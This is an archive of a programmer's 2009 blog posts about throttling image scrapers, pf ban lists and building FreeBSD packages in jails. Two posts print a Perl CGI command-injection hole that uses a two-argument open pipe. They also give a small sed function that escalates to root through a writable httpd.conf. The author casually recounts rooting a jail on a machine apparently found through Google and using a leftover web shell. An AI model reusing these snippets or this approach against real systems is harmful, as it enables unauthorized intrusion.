The random rantings of a concerned programmer.

Archive for February, 2009

(Untitled)

February 26th, 2009 | Category: Random

lol fixed the scrapers scraping 4scrape problem (or, as much as I’m willing to).

The problem, as I see it, is that scrapers have a very abnormal usage pattern compared to normal visitors — they’re just pulling the big, heavy images, which cost a lot of bandwidth and CPU (in the form of I/O interrupts) to serve. My solution was to write a lighttpd module which throttles the number of “expensive” requests you can make. I don’t really give a shit that they’re scraping — what pisses me off is that they’re bringing the server to its knees by doing so.

Each IP address is associated with an integer representing the amount of resources it’s used. This value is reduced by a configurable amount each second, and increases whenever they access a marked resource. Once it gets over a maximum amount, the module starts throwing back 403 responses.

The way I’ve got it configured right now is to add 20 points for each full-size image fetched, then decay that value by 1 point/second. The maximum is 200 points before the server starts 403'ing, with a 600-point upper bound on the accumulated score. Basically, this gives you a wallpaper every 20 seconds, while still allowing bursts of activity.
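The decay/charge logic is simple enough to sketch in a few lines of sh. This is just an illustration using the numbers above, not the actual lighttpd module (which tracks a per-IP table in C); all the names here are made up:

```shell
#!/bin/sh
# Sketch of the throttle: +20 per image, 1 point/sec decay, deny above 200,
# accumulated score capped at 600.
COST=20 DECAY=1 LIMIT=200 CAP=600
score=0 last=0

request() {   # request <unix-time>; sets $RESULT to ALLOW or DENY
    now=$1
    # decay the score for the time elapsed since the last request
    score=$((score - (now - last) * DECAY))
    [ "$score" -lt 0 ] && score=0
    last=$now
    if [ "$score" -gt "$LIMIT" ]; then
        RESULT=DENY                     # the real module answers 403 here
    else
        score=$((score + COST))
        [ "$score" -gt "$CAP" ] && score=$CAP
        RESULT=ALLOW
    fi
    echo "$RESULT"
}
```

At steady state that works out to one image per COST/DECAY = 20 seconds, with a burst of roughly LIMIT/COST images allowed before the 403s start.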

I’ve also got code in place that stat(2)’s the requested files and bases the cost on the file size, but I haven’t gotten around to testing it yet. Deploying a fucking lighttpd plugin was a goddamn nightmare (at least, compared to an Apache module) because the lighttpd developers are retards or something.

Anyway, we’ll see how this pans out. [source]

Comments are off for this post

(Untitled)

February 25th, 2009 | Category: Random

lol so we had lots of extra RAM sitting around on Rimi, so I had Shuugo up PostgreSQL’s work_mem from 256MB to 1024MB. Then I noticed that, hey, Rimi was like 100% loaded.

Long story short, a surprising number of people were scraping 4scrape. Not only were they scraping it, but they were doing it by assuming that the images were a simple enumeration: (1..100000).jpg, which is absolutely retarded. So I added a bunch of class C CIDR blocks to pf.conf and have a couple more tricks up my sleeve.
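For what it’s worth, the pf side of a ban list like that only takes a couple of lines — the ranges below are placeholder addresses, not the actual blocks I banned:

```pf
# hypothetical pf.conf fragment -- the ranges are placeholders
table <scrapers> persist { 192.0.2.0/24, 198.51.100.0/24 }
block in quick from <scrapers> to any
```

New ranges can then be added at runtime with pfctl -t scrapers -T add <net> instead of editing pf.conf and reloading.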

I think it’s absolutely retarded that someone would scrape 4scrape. Most of the shit in there is /wg/’s dirty cumstained laundry — tidus, bleach, desktop threads, 4chan.hta spam, etc. Why the fuck would anyone want to scrape all of that shit? And why do people think I’m not going to notice when AWstats shows that IP X decided to burn 5GB of bandwidth yesterday?

That’s an obvious “PLEASE BAN ME” — there aren’t 5GB of wallpapers worth viewing on 4scrape.

EDIT: lol I’m getting trolled. hard :(

1 comment

Automatic, Jailed Package Building

February 20th, 2009 | Category: Random

WordPress 2.7 can bite my fucking ass. STOP FUCKING EATING MY POSTS YOU REEKING PILE OF SHIT!

Anyway. I’ve ranted a lot about using jails to keep potentially vulnerable services from compromising one another, but there’s a lot more you can do with them. I’m working on a system right now which provides disposable, on-demand development environments: when a developer wants to do some work, they just instantiate a clean mirror of our production system, hammer away, then commit their changes and throw the environment away.

One part of this system is keeping all of the software in sync between the production environment and the jail instances the devel stuff runs in — a perfect application for packages. For easy management, I just want a text file with a list of ports, ie

editors/vim
lang/python
www/apache22

Then have a script go through that and build all the appropriate packages, which then get picked up and installed automatically when a jail is instantiated (via ezjail, of course). Once you’ve got all of the packages, you can just serve them out over HTTP (by setting PACKAGESITE) or dump them into an ezjail flavor.
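A minimal driver for that list could look something like this. The function name and the echo stub are mine; the real build step (commented out) only makes sense inside the build jail:

```shell
#!/bin/sh
# Hypothetical driver for a ports list like the one above: one origin per
# line, blanks and #-comments skipped. The build is stubbed with an echo.
build_list() {   # build_list <file>
    while IFS= read -r PORT; do
        case "$PORT" in ''|\#*) continue ;; esac
        echo "building package for /usr/ports/$PORT"
        # inside the build jail this would be:
        # ( cd "/usr/ports/$PORT" && make BATCH=yes package-recursive clean )
    done < "$1"
}
```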

As much as I love ezjail, it didn’t exactly make this easy. The first catch is that you can’t actually build a package within an ezjail-instantiated jail because of the games it plays with the ports system (ie, the ports makefiles want to write the package tarball to /usr/ports, which is mounted as read-only). I kind of wanted the packages to be written outside of the jail anyway, since I just want to delete the jail when everything’s finished. Just the place for some mountpoint games –

# Change ezjail's symlink to a mountable directory
rm $BUILD_JAIL_PATH/usr/ports
mkdir $BUILD_JAIL_PATH/usr/ports

mount -t nullfs $JAIL_PATH/basejail/usr/ports $BUILD_JAIL_PATH/usr/ports
mount -t unionfs $PACKAGE_DIR_PATH $BUILD_JAIL_PATH/usr/ports

The other nasty bit is actually building the packages within a jail from within an unjailed script. All it should take is a couple of for loops to configure and then package everything –

for PORT in $PACKAGE_LIST ; do
    cd /usr/ports/$PORT 
    make config-recursive
done

for PORT in $PACKAGE_LIST ; do
    cd /usr/ports/$PORT 
    make BATCH=yes package-recursive clean
done

Unfortunately, the ezjail-admin console command uses an execv(2)-style call to spawn the jailed process rather than running it through sh -c (which is probably what the jail command it wraps does internally), so you have to explicitly pass it sh -c followed by the whole command as a single argument.

And I couldn’t figure out how the fuck to quote the nice big chunk of code properly, so I took a slightly different route — just cat it all into a file within the jail, then execute that script directly with ezjail-admin console. It’s retarded, but it works.
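A sketch of that workaround — the jail name and paths are invented, JAIL_ROOT defaults to a scratch directory so the sketch runs anywhere, and the ezjail-admin console -e invocation assumes a version that supports -e:

```shell
#!/bin/sh
# Hypothetical sketch: write the build script into the jail's tree, then
# execute it directly with ezjail-admin console.
JAIL=pkgbuild
JAIL_ROOT=${JAIL_ROOT:-$(mktemp -d)}    # in real life: /usr/jails/$JAIL

mkdir -p "$JAIL_ROOT/tmp"
cat > "$JAIL_ROOT/tmp/build.sh" <<'EOF'
#!/bin/sh
# runs *inside* the jail, so these paths are jail-relative
for PORT in $(cat /tmp/ports.txt); do
    cd /usr/ports/$PORT && make BATCH=yes package-recursive clean
done
EOF
chmod +x "$JAIL_ROOT/tmp/build.sh"

# only attempt the jailed run where ezjail is actually installed
if command -v ezjail-admin >/dev/null 2>&1; then
    ezjail-admin console -e /tmp/build.sh "$JAIL"
fi
```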

[source]

6 comments

(Untitled)

February 19th, 2009 | Category: Random

I think I might have mono, lol. Been incredibly fatigued with more phlegm than normal and a soft, dry cough. I’ve more appetite than usual, but I’m attributing that to an increase in physical activity the past couple weeks.

Anyway, I was Googling around yesterday and, sure enough, found some other legacy Perl scripts which have some nice vulnerabilities:

use CGI;
$query  = new CGI;
$target = $query->param('link');          # attacker-controlled
$TARGETPAGE = "../$target";
# two-argument open: a trailing '|' in $TARGETPAGE turns this into a
# pipe open, i.e. arbitrary command execution
open(INFILE, "$TARGETPAGE") || die "bogus file supplied: $TARGETPAGE";
while (<INFILE>) { print STDOUT $_; }
close(INFILE);

Basically, it’s the nicest thing they could have done — send an unchecked user string to Perl’s two-argument open function. open has this awesome feature called a “pipe open”: if the last character of the filename is a |, everything before it is handed to the shell, and the filehandle is bound to the new process’s stdout.

Anyway I had a nice long writeup about the machine in question but fucking WordPress ate the goddamn post. Spoiler: it’s running FreeBSD 4.7 and is actually properly set up — Apache and MySQL are running in a jail, so even after rooting the jail I can’t get tentacles into the kernel to properly compromise the machine (and I was so looking forward to stretching my legs with a nice FreeBSD kernel module in C). If only our machines at work were set up so nicely.

boring nyoro~n

Comments are off for this post

(Untitled)

February 17th, 2009 | Category: Random

If you remember back, some of our sister libraries have incompetent system administrators or something. I’ve been spending today migrating some of our legacy systems off one of their old machines (ie, scraping it lol) and, while I was waiting for my scripts to run, I decided to poke around the machine again.

A quick svn st in the cgi-local directory showed that someone had dropped something in there named sys.pl. Popped open the file in vi and saw that it was a CGI-Telnet instance (with the default password still set lol). So I popped open a web browser and logged in.

Now, there isn’t that much you can do as the apache user (or any other limited user), and really, I think they’ve gotten used to having the machine hacked. Breaking into the damn thing is trivial — it’s got a soft and chewy outside. Today’s goal was to take a bite out of the soft and chewy center and get myself root access to really scare the shit out of them (especially since their production svn repo is hosted on this machine).

Unfortunately, it took me all of 20 seconds to root the box. /etc/httpd/conf/httpd.conf is owned by the apache user, which means I just had to change the User/Group directives to run as root/wheel and crash+restart Apache to get root. It was so boring I didn’t even bother actually doing it. So I told my boss and we had a good laugh about it, followed by a quick-spoken “our services are off that machine, right?”
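The whole attack fits in a couple of lines — the path is taken from above but everything else here is hypothetical, and (to be clear) this is the thing I didn’t actually run:

```shell
#!/bin/sh
# Sketch of the escalation: httpd.conf is writable by the apache user, so
# rewrite the User/Group directives, then do the crash+restart mentioned
# above so the new directives take effect.
escalate() {   # escalate <path-to-httpd.conf>
    sed -e 's/^User .*/User root/' \
        -e 's/^Group .*/Group wheel/' "$1" > "$1.new" &&
        mv "$1.new" "$1"
}
```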

Yeah, they’re off that machine.

I love caramel.

1 comment
